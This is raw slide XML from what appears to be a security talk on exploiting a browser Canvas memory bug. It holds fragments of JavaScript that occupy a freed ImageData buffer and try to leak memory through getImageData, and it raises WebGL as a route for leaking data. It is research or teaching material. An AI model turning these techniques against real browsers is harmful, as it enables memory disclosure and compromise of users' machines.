              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>TypedArray</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ImageData</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nn-NO" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nn-NO" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nn-NO" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>//Occupy by Array (0x10)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"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2411076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One</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-ea"/>
                <a:cs typeface="SimHei" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="文本框 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{87BF7D6C-93BE-48C2-869E-8D0634182172}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1013902" y="2531671"/>
            <a:ext cx="4611857" cy="432554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ctx.putImageData</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>imageData</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, 0, 0);</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="图片 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2488424C-D32D-4CA5-8A16-20A73FED8777}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6891474" y="4349424"/>
            <a:ext cx="5140105" cy="523692"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="图片 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{733E8FBB-1C2B-461C-87FD-3E088509B370}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1078125" y="4180639"/>
            <a:ext cx="5753863" cy="1220079"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16" name="图片 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{40DEC149-303A-4159-90E1-50C3DEC48A4E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1018638" y="5891636"/>
            <a:ext cx="5825509" cy="1038713"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18" name="图片 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D0CBD53A-8C7E-4B33-A095-15589ABF36B0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1041310" y="6922972"/>
            <a:ext cx="5780163" cy="347244"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19" name="图片 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EAF0DA13-D233-47FC-9E87-1B02F86A1E60}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1078125" y="7804775"/>
            <a:ext cx="5965270" cy="1267619"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="文本框 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{798AAACF-4044-4B6F-8F01-272708ED968D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1013901" y="2962719"/>
            <a:ext cx="9406437" cy="772776"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CCanvasImageData</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CopyRectToCanvas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> will copy the data in the position of the occupied </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ImageData.buffer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> to the Canvas internal buffer.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="文本框 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{490F8C2C-8305-4FD8-B70A-D44B44F6B60B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1078125" y="3763206"/>
            <a:ext cx="4611857" cy="432554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Canvas internal buffer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="文本框 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A4F49F3-3988-469F-854E-755F283883C7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1034582" y="5409887"/>
            <a:ext cx="4611857" cy="432554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Occupied Integer array object</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="文本框 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D86142DC-1AB2-4439-8D03-C5528CEF15E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1013902" y="7334970"/>
            <a:ext cx="4611852" cy="432554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Canvas internal buffer after copy</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="矩形 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F5F2891F-8871-4E30-82B9-C76D3F3BEC2C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1041311" y="7980705"/>
            <a:ext cx="1566498" cy="22239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1EAD6557-11EE-445E-920B-BEAE80DF1B45}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1041310" y="4372913"/>
            <a:ext cx="1566499" cy="17495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26" name="连接符: 肘形 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{87F4034C-5D75-4E79-9F0B-91AC206911FE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="25" idx="1"/>
            <a:endCxn id="24" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1" flipV="1">
            <a:off x="1041309" y="4460391"/>
            <a:ext cx="1" cy="3631512"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -22860000000"/>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27" name="矩形 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C454B83E-3505-45A2-86D9-B98A1035D08E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2787258" y="8018573"/>
            <a:ext cx="2137822" cy="16802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367EF052-1BDD-484F-B342-AE3842698B0C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2621933" y="6085434"/>
            <a:ext cx="2137822" cy="16802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0" name="连接符: 肘形 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F7934D50-F235-4AC4-861B-C2C4001D2858}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="29" idx="3"/>
            <a:endCxn id="27" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4759755" y="6169445"/>
            <a:ext cx="165325" cy="1933139"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 238273"/>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132424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One</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-ea"/>
                <a:cs typeface="SimHei" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="文本框 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{87BF7D6C-93BE-48C2-869E-8D0634182172}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1013902" y="2531671"/>
            <a:ext cx="11017678" cy="2133661"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>imageData1 = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ctx.getImageData</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(0, 0, 0x80, 0x80);	</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>var ta1 = imageData1.data;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="sv-SE" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>var x = ta1[0] + ta1[1]*0x100+ta1[2]*0x10000+ta1[3]*0x1000000</a:t>
            </a:r>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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="矩形 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E37AF65-D71C-41A9-B3BC-D1062CFED170}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1078124" y="7521853"/>
            <a:ext cx="10953455" cy="2191882"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The function CCanvasRenderingContext2D::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Var_getImageData</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> can read 0x80*0x80 occupied data from the Canvas internal buffer, but unfortunately the data returned by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>getImageData</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> has undergone some transformation (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>premultiplied</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> alpha), so the original occupied data cannot be leaked. .</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Can find a way to leak real data in the WebGL API?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9BC7CE23-6008-481A-83FB-B71617806354}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1078125" y="3705097"/>
            <a:ext cx="4842242" cy="3816755"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CEF89FF1-F920-4E56-98F4-CC5686DD3544}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5920367" y="3705097"/>
            <a:ext cx="5380952" cy="2276190"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="89525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Two</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-ea"/>
                <a:cs typeface="SimHei" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="文本框 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C2773F85-4521-41D0-957F-E8AC556CA6CC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1078123" y="2571363"/>
            <a:ext cx="10953455" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="SimHei" charset="-122"/>
              </a:rPr>
              <a:t>What is WebGL?</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:ea typeface="SimHei" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="文本框 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DAC24865-B6B9-4D6E-A0C8-0CD9F29A8B0F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1078125" y="4357569"/>
            <a:ext cx="10953455" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WebGLRenderingContext</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="文本框 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FEE09AE4-F921-40A2-BD97-0E868D404E91}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1074329" y="6892011"/>
            <a:ext cx="10953455" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
